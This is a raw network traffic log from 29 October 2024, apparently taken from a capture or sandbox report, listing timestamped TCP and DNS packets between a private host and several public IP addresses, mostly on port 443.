                                                                          Oct 29, 2024 16:51:02.114722967 CET44349736104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:02.114998102 CET49736443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:02.115015030 CET44349736104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:02.116198063 CET44349736104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:02.116508007 CET49736443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:02.116643906 CET49736443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:02.116648912 CET44349736104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:02.116689920 CET44349736104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:02.116734982 CET49736443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:02.116816044 CET44349736104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:02.116929054 CET49736443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:02.116964102 CET44349736104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:02.454725981 CET44349736104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:02.454924107 CET44349736104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:02.455023050 CET49736443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:02.455046892 CET44349736104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:02.455142975 CET44349736104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:02.455193996 CET49736443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:02.455202103 CET44349736104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:02.455396891 CET44349736104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:02.455451012 CET49736443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:02.455962896 CET49736443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:02.455976963 CET44349736104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:02.458617926 CET49737443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:02.458652020 CET44349737104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:02.458736897 CET49737443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:02.458967924 CET49737443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:02.458981991 CET44349737104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:02.704032898 CET49738443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:02.704062939 CET44349738188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:02.704155922 CET49738443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:02.704471111 CET49738443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:02.704488993 CET44349738188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:03.067944050 CET44349737104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:03.068279982 CET49737443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:03.068301916 CET44349737104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:03.069335938 CET44349737104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:03.069411039 CET49737443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:03.069700956 CET49737443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:03.069768906 CET44349737104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:03.069839954 CET49737443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:03.069847107 CET44349737104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:03.110168934 CET49737443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:03.223411083 CET44349737104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:03.223601103 CET44349737104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:03.223680973 CET49737443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:03.223975897 CET49737443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:51:03.223990917 CET44349737104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:51:03.361221075 CET44349738188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:03.361557007 CET49738443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:03.361577034 CET44349738188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:03.362596989 CET44349738188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:03.362667084 CET49738443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:03.368576050 CET49738443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:03.368597031 CET49738443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:03.368649006 CET49738443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:03.368655920 CET44349738188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:03.368720055 CET49738443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:03.368997097 CET49739443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:03.369034052 CET44349739188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:03.369108915 CET49739443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:03.369307041 CET49739443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:03.369314909 CET44349739188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:03.668193102 CET4968080192.168.2.16192.229.211.108
                                                                          Oct 29, 2024 16:51:04.004709005 CET44349739188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:04.004988909 CET49739443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:04.005002975 CET44349739188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:04.006545067 CET44349739188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:04.006624937 CET49739443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:04.007741928 CET49739443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:04.007879019 CET44349739188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:04.007932901 CET49739443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:04.051151037 CET49739443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:04.051168919 CET44349739188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:04.099160910 CET49739443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:07.991338015 CET4926453192.168.2.16162.159.36.2
                                                                          Oct 29, 2024 16:51:07.997705936 CET5349264162.159.36.2192.168.2.16
                                                                          Oct 29, 2024 16:51:07.997805119 CET4926453192.168.2.16162.159.36.2
                                                                          Oct 29, 2024 16:51:08.003915071 CET5349264162.159.36.2192.168.2.16
                                                                          Oct 29, 2024 16:51:08.597623110 CET4926453192.168.2.16162.159.36.2
                                                                          Oct 29, 2024 16:51:08.604670048 CET5349264162.159.36.2192.168.2.16
                                                                          Oct 29, 2024 16:51:08.604722977 CET4926453192.168.2.16162.159.36.2
                                                                          Oct 29, 2024 16:51:08.643462896 CET49265443192.168.2.1620.242.39.171
                                                                          Oct 29, 2024 16:51:08.643487930 CET4434926520.242.39.171192.168.2.16
                                                                          Oct 29, 2024 16:51:08.643559933 CET49265443192.168.2.1620.242.39.171
                                                                          Oct 29, 2024 16:51:08.643964052 CET49265443192.168.2.1620.242.39.171
                                                                          Oct 29, 2024 16:51:08.643974066 CET4434926520.242.39.171192.168.2.16
                                                                          Oct 29, 2024 16:51:08.826162100 CET49678443192.168.2.1620.189.173.10
                                                                          Oct 29, 2024 16:51:09.531580925 CET4434926520.242.39.171192.168.2.16
                                                                          Oct 29, 2024 16:51:09.531688929 CET49265443192.168.2.1620.242.39.171
                                                                          Oct 29, 2024 16:51:09.533977985 CET49265443192.168.2.1620.242.39.171
                                                                          Oct 29, 2024 16:51:09.533989906 CET4434926520.242.39.171192.168.2.16
                                                                          Oct 29, 2024 16:51:09.534235954 CET4434926520.242.39.171192.168.2.16
                                                                          Oct 29, 2024 16:51:09.535396099 CET49265443192.168.2.1620.242.39.171
                                                                          Oct 29, 2024 16:51:09.583327055 CET4434926520.242.39.171192.168.2.16
                                                                          Oct 29, 2024 16:51:09.700824022 CET4434926520.242.39.171192.168.2.16
                                                                          Oct 29, 2024 16:51:09.701103926 CET49265443192.168.2.1620.242.39.171
                                                                          Oct 29, 2024 16:51:09.701155901 CET4434926520.242.39.171192.168.2.16
                                                                          Oct 29, 2024 16:51:09.701173067 CET49265443192.168.2.1620.242.39.171
                                                                          Oct 29, 2024 16:51:09.701307058 CET4434926520.242.39.171192.168.2.16
                                                                          Oct 29, 2024 16:51:09.701343060 CET4434926520.242.39.171192.168.2.16
                                                                          Oct 29, 2024 16:51:09.701361895 CET49265443192.168.2.1620.242.39.171
                                                                          Oct 29, 2024 16:51:09.701399088 CET49265443192.168.2.1620.242.39.171
                                                                          Oct 29, 2024 16:51:09.717293024 CET49266443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:09.717320919 CET443492664.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:09.717392921 CET49266443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:09.717812061 CET49266443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:09.717818975 CET443492664.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:11.204801083 CET443492664.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:11.204902887 CET49266443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:11.206130028 CET49266443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:11.206135988 CET443492664.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:11.206459045 CET443492664.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:11.207534075 CET49266443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:11.255337000 CET443492664.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:11.457787037 CET443492664.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:11.458022118 CET49266443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:11.458040953 CET443492664.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:11.458050013 CET49266443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:11.458307981 CET443492664.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:11.458358049 CET443492664.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:11.458417892 CET49266443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:12.529886961 CET49267443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:12.529917002 CET443492674.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:12.529994965 CET49267443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:12.530656099 CET49267443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:12.530673027 CET443492674.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:13.275176048 CET4968080192.168.2.16192.229.211.108
                                                                          Oct 29, 2024 16:51:13.649673939 CET443492674.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:13.649760962 CET49267443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:13.651037931 CET49267443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:13.651046991 CET443492674.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:13.651346922 CET443492674.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:13.652373075 CET49267443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:13.699337959 CET443492674.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:14.032640934 CET443492674.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:14.032665968 CET443492674.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:14.032680988 CET443492674.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:14.032759905 CET49267443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:14.032778978 CET443492674.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:14.032831907 CET49267443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:14.071109056 CET443492674.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:14.071252108 CET49267443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:14.071273088 CET443492674.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:14.071408033 CET49267443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:14.071425915 CET443492674.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:14.071435928 CET49267443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:14.071592093 CET443492674.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:14.071629047 CET443492674.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:14.071677923 CET49267443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:14.243690968 CET49268443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:14.243712902 CET443492684.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:14.243798971 CET49268443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:14.244127989 CET49268443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:14.244143963 CET443492684.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:14.272325993 CET443492684.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:14.272413969 CET49268443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:14.272475004 CET49268443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:14.272484064 CET443492684.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:14.277225971 CET49269443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:14.277280092 CET443492694.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:14.277364016 CET49269443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:14.277682066 CET49269443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:14.277698994 CET443492694.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:15.392456055 CET443492694.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:15.392617941 CET49269443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:15.393918991 CET49269443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:15.393927097 CET443492694.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:15.394224882 CET443492694.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:15.399321079 CET49269443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:15.447338104 CET443492694.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:15.773895025 CET443492694.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:15.773962021 CET443492694.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:15.774007082 CET443492694.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:15.774122000 CET49269443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:15.774147987 CET443492694.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:15.774185896 CET49269443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:15.774204016 CET49269443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:15.889161110 CET443492694.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:15.889226913 CET443492694.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:15.889276981 CET49269443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:15.889305115 CET443492694.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:15.889317036 CET49269443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:15.889678001 CET49269443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:15.889693022 CET443492694.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:15.889713049 CET49269443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:15.889879942 CET443492694.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:15.889921904 CET443492694.175.87.197192.168.2.16
                                                                          Oct 29, 2024 16:51:15.889961958 CET49269443192.168.2.164.175.87.197
                                                                          Oct 29, 2024 16:51:41.325922012 CET44349739188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:41.325970888 CET44349739188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:41.326004982 CET44349739188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:41.326046944 CET44349739188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:41.326065063 CET44349739188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:41.326086044 CET49739443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:41.326096058 CET44349739188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:41.326132059 CET49739443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:41.326136112 CET44349739188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:41.326148987 CET49739443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:41.326153994 CET44349739188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:41.326214075 CET49739443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:41.326463938 CET44349739188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:41.326692104 CET44349739188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:41.326736927 CET49739443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:41.326864004 CET49739443192.168.2.16188.114.97.3
                                                                          Oct 29, 2024 16:51:41.326884031 CET44349739188.114.97.3192.168.2.16
                                                                          Oct 29, 2024 16:51:41.393474102 CET49270443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:41.393542051 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:41.393646955 CET49270443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:41.393892050 CET49270443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:41.393908024 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:41.442445993 CET49271443192.168.2.16151.101.129.229
                                                                          Oct 29, 2024 16:51:41.442476034 CET44349271151.101.129.229192.168.2.16
                                                                          Oct 29, 2024 16:51:41.442569971 CET49271443192.168.2.16151.101.129.229
                                                                          Oct 29, 2024 16:51:41.442611933 CET49272443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:41.442645073 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:41.442699909 CET49272443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:41.442837954 CET49271443192.168.2.16151.101.129.229
                                                                          Oct 29, 2024 16:51:41.442848921 CET44349271151.101.129.229192.168.2.16
                                                                          Oct 29, 2024 16:51:41.442997932 CET49272443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:41.443007946 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:41.454319000 CET44349271151.101.129.229192.168.2.16
                                                                          Oct 29, 2024 16:51:41.454802990 CET49276443192.168.2.16151.101.129.229
                                                                          Oct 29, 2024 16:51:41.454840899 CET44349276151.101.129.229192.168.2.16
                                                                          Oct 29, 2024 16:51:41.454920053 CET49276443192.168.2.16151.101.129.229
                                                                          Oct 29, 2024 16:51:41.455075979 CET49276443192.168.2.16151.101.129.229
                                                                          Oct 29, 2024 16:51:41.455087900 CET44349276151.101.129.229192.168.2.16
                                                                          Oct 29, 2024 16:51:41.466166019 CET44349276151.101.129.229192.168.2.16
                                                                          Oct 29, 2024 16:51:42.017858982 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:42.018161058 CET49270443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:42.018176079 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:42.019185066 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:42.019295931 CET49270443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:42.019582987 CET49270443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:42.019644022 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:42.019763947 CET49270443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:42.019768953 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:42.060244083 CET49270443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:42.066294909 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.108253956 CET49272443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.108267069 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.111435890 CET49272443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.111450911 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.111732960 CET49272443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.111738920 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.111967087 CET49272443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.111973047 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.237442017 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.238359928 CET49272443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.238383055 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.242758989 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.282603979 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.282677889 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.282711983 CET49272443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.282726049 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.282747984 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.282762051 CET49272443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.282776117 CET49272443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.332273960 CET49272443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.361592054 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.361676931 CET49272443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.361690998 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.401331902 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.401381016 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.401412010 CET49272443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.401433945 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.401446104 CET49272443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.415664911 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.415699959 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.415777922 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.415988922 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.416003942 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.444262028 CET49272443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.716809988 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.716850042 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:42.716938019 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.717905998 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:42.717917919 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.053949118 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.054335117 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.054352045 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.055403948 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.055486917 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.055875063 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.055947065 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.056082010 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.056091070 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.100255966 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.203958988 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.204008102 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.204044104 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.204071999 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.204098940 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.204125881 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.204137087 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.204148054 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.204157114 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.204176903 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.204339981 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.204372883 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.204384089 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.204394102 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.204437971 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.325027943 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.325515985 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.325527906 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.326972961 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.326981068 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.327055931 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.327189922 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.327241898 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.327251911 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.327475071 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.327506065 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.327552080 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.327574015 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.327581882 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.327673912 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.327733040 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.327733040 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.327742100 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.327753067 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.328196049 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.328258038 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.328265905 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.371403933 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.371403933 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.371426105 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.419292927 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.450620890 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.450834036 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.450952053 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.450961113 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.450989008 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.451035976 CET49280443192.168.2.16104.17.24.14
